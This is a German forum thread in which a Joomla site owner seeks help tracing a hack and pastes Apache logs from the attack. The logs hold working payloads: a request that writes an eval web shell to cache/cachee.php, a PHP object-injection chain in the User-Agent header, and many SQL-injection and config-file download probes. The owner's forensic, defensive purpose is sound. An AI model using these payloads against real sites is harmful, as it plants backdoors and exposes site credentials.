Hallo Leute,
Danke für Eure Beiträge.
Mein Versuch, die Website neu aufzusetzen mit frischen joomla und Plugin Dateien war leider nicht erfolgreich, ich hatte das Template mit Overrides, u.a. mit einem veralteten visforms, und die Datenbank übernommen. Wahrscheinlich war das Hintertürchen noch drin, nach einigen Tagen kam eine freundliche Email von google: "Hacked content detected".
Weil mir jetzt die Zeit davonläuft spiele ich eine alte, pre-joomla, Version der Website ein.
Auf der sicheren Seite ist man nur, wenn man auch alle Overrides neu erstellt und den Webseiteninhalt in einer neuen DB neu anlegt, vermute ich?! Was für eine Arbeit!!
Können diese Gangster Ihre Energie nicht in etwas für die Menschheit sinnvolles investieren? Brech!
Gruß
Uwe
Beiträge von HinzBerlin
-
-
Dank Dir flotte, der Artikel ist sehr interessant
Uwe
-
Zitat
Also erst alles Rücksichern und dann untersuchen?
Nö, zuerst alles kompett heruntergeladen (einschl. DB) und dann das Backup zurückgespielt.
Zu meiner Frage (Danke für Eure Antworten)
Ich meine eigentlich was dieser GET Befehl GET //?1=@ an sich bedeutet. Normalerweise steht hier doch die URL drin. Will er damit den Apache überlisten? Hat ja offensichtlich geklappt.
Das Modul "mod_articles_tags" hat der Kollege selbst installiert, wir benutzen das nicht und im Backup ist es auch nicht drin.
Der Hack ist ganz schön im web.log zu sehen:Code
Alles anzeigen62.210.88.198 - - [03/Jan/2017:23:22:58 +0100] "GET / HTTP/1.1" 200 40041 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0" 62.210.88.198 - - [03/Jan/2017:23:22:59 +0100] "GET / HTTP/1.1" 200 39822 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" 62.210.88.198 - - [03/Jan/2017:23:22:59 +0100] "GET / HTTP/1.1" 200 39822 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" 62.210.88.198 - - [03/Jan/2017:23:22:59 +0100] "GET //?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo '-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENAME'%5D).'/cache/cachee.php','%3C?php eval($_POST%5B1%5D);?%3E');echo '%7C%3C-'; HTTP/1.1" 200 39823 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" 62.210.88.198 - - [03/Jan/2017:23:23:00 +0100] "GET //plugins/content/fsave/download.php?filename=configuration.php HTTP/1.1" 404 1572 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:00 +0100] "GET / HTTP/1.1" 200 39822 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:46:\"eval($_REQUEST[1]);JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xfd\xfd\xfd\xfd" 62.210.88.198 - - [03/Jan/2017:23:23:00 +0100] "GET //?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo '-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENAME'%5D).'/cache/cachee.php','%3C?php eval($_POST%5Bshine%5D);?%3E');echo '%7C%3C-'; HTTP/1.1" 200 39823 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" 62.210.88.198 - - [03/Jan/2017:23:23:00 +0100] "GET /index.php?option=com_contenthistory&view=history&list%5Bordering%5D=&item_id=1&type_id=1&list%5Bselect%5D=(select 1 from (select count(*),concat((select 0x6275677363616E776B),floor(rand(0)*2))x from information_schema.tables group by x)a) HTTP/1.1" 403 1749 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0" 62.210.88.198 - - [03/Jan/2017:23:23:00 +0100] "GET /index.php?jat3action=gzip&type=css&file=configuration.php HTTP/1.1" 200 39831 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:01 +0100] "GET /index.php?option=com_jetext&task=download&file=%5B../../index.php%5D HTTP/1.1" 404 1575 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:01 +0100] "GET /index.php?option=com_cckjseblod&task=download&file=configuration.php HTTP/1.1" 404 1575 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:01 +0100] "GET /administrator/manifests/files/joomla.xml HTTP/1.1" 200 1905 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:01 +0100] "GET /index.php/weblinks-categories?id=0 ) union select md5(3.1415)-- ) HTTP/1.1" 404 1572 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:02 +0100] "GET /index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/md5(3.1415),222-- - HTTP/1.1" 404 1575 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:02 +0100] "GET /index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999+UNION+SELECT+md5(3.1415)-- HTTP/1.1" 404 1575 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:02 +0100] "GET /index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=com_enmasse&sortBy=117 and(select 1 from(select count(*),concat((select (select (select mid(md5(3.1415),1,16)) ) from %60information_schema%60.tables limit 0%2C1)%2Cfloor(rand(0)*2))x from %60information_schema%60.tables group by x)a) and 1=1 HTTP/1.1" 404 1575 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:02 +0100] "GET /index.php?option=com_vnmshop&catid=113 LIMIT 0,1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5(3.1415),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL HTTP/1.1" 404 1575 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:03 +0100] "GET /index.php?option=com_job&controller=listcategory&task=viewJob&id_job=-1+UNION+ALL+SELECT+1,md5(3.1415),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42-- HTTP/1.1" 404 1575 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:03 +0100] "GET /index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22 and 1=0 union select 1,2,3,4,5,6,7,8,md5(3.1415),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422 HTTP/1.1" 404 1575 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:03 +0100] "GET /index.php?option=com_memorix&task=result&searchplugin=theme&Itemid=60&ThemeID=-8594+union+select+111,222,MD5(3.1415),444,555,666,777,888,999--+AbuHassan HTTP/1.1" 404 1575 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:03 +0100] "GET /index.php?option=com_ebcontent&view=article&tmpl=component&id=MD5(3.1415)&cid=9&print= HTTP/1.1" 404 1575 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:04 +0100] "GET //index.php?option=com_subcategory&id=20+UNION+SELECT+md5(3.1415)-- HTTP/1.1" 404 1575 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:04 +0100] "GET /index.php?option=com_ebcontent&view=article&tmpl=component&id=MD5(3.1415)&cid=9&print= HTTP/1.1" 404 1575 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:04 +0100] "GET /index.php?option=com_contactformmaker&view=contactformmaker&id=1 AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(md5(3.1415),FLOOR (RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)--+ HTTP/1.1" 404 1575 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:05 +0100] "GET //index.php?option=com_hotproperty&task=asearch&Item id=27&search_id=2&Itemid=' HTTP/1.1" 404 1575 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:05 +0100] "GET /index.php?option=com_jomestate&task=print&id=MD5(3.1415)&cid=9&print= HTTP/1.1" 404 1575 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:05 +0100] "GET /administrator/index.php HTTP/1.1" 200 5747 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:05 +0100] "GET /administrator/index.php HTTP/1.1" 200 5747 "-" "-" 62.210.88.198 - - [03/Jan/2017:23:23:06 +0100] "POST /administrator/index.php HTTP/1.1" 303 - "http://www.xxxx.de" "-" 62.210.88.198 - - [03/Jan/2017:23:23:06 +0100] "GET /administrator/index.php HTTP/1.1" 200 39789 "http://www.xxxx.de" "-"
Edit by @Indigo66: Langen Code in Spoiler. Forenregeln bechten!
-
Hallo,
leider wurde unsere joomla Seite letztens gehackt, zum Glück hatten wir DB- und Dateibackups, so dass der Vorzustand wieder hergestellt ist.
Um ein erneutes Hacken zu verhindern, suche ich jetzt den Weg, den der Einbrecher gegangen ist, dabei sind mir die Zeilen unten aufgefallen.
Kann mir jemand sagen, was dieser Aufruf "GET //?1=@ini_set(%22display_errors" im web.log? bedeutet und wie man so etwas verhindern kann?
(Vermutlich per .htaccess, aber was macht dieser Aufruf?)
Die Templatepositionen /?tp habe ich bereits deaktiviert und bin jetzt dabei weitere Tipps von joomla-security umzusetzen.
Ja, der Zugriff auf /administrator ist inzwischen auch per .htaccess blockiert.Weitere nette log-Zeilen:
Code62.210.88.198 - - [03/Jan/2017:23:22:59 +0100] "GET //?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo '-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENAME'%5D).'/cache/cachee.php','%3C?php eval($_POST%5B1%5D);?%3E');echo '%7C%3C-'; HTTP/1.1" 200 39823 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" 62.210.88.198 - - [03/Jan/2017:23:23:00 +0100] "GET //?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo '-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENAME'%5D).'/cache/cachee.php','%3C?php eval($_POST%5Bshine%5D);?%3E');echo '%7C%3C-'; HTTP/1.1" 200 39823 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" 62.210.88.198 - - [03/Jan/2017:23:23:06 +0100] "POST /administrator/index.php HTTP/1.1" 303 - "http://www.xxxx.de" "-" 35.166.247.183 - - [03/Jan/2017:18:53:42 +0100] "POST /admin/Cms_Wysiwyg/directive/index/ HTTP/1.1" 404 1572 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 107.151.137.246 - - [07/Jan/2017:02:59:38 +0100] "POST /modules/mod_articles_tags/mod_articles_tags.php?login=uxgax HTTP/1.1" 200 16 "http://www.xxxx.de/modules/mod_articles_tags/mod_articles_tags.php?login=uxgax" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537 (KHTML, like Gecko)" 192.200.212.204 - - [07/Jan/2017:03:58:50 +0100] "POST /modules/mod_articles_tags/mod_articles_tags.php?login=uxgax HTTP/1.1" 200 12 "-" "-" 107.151.137.246 - - [07/Jan/2017:02:59:38 +0100] "POST /modules/mod_articles_tags/mod_articles_tags.php?login=uxgax HTTP/1.1" 200 16 "http://www.xxxx.de/modules/mod_articles_tags/mod_articles_tags.php?login=uxgax" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537 (KHTML, like Gecko)" 192.200.212.204 - - [07/Jan/2017:03:58:50 +0100] "POST /modules/mod_articles_tags/mod_articles_tags.php?login=uxgax HTTP/1.1" 200 12 "-" "-"
Vielen Dank
Uwe
joomla 3.6.5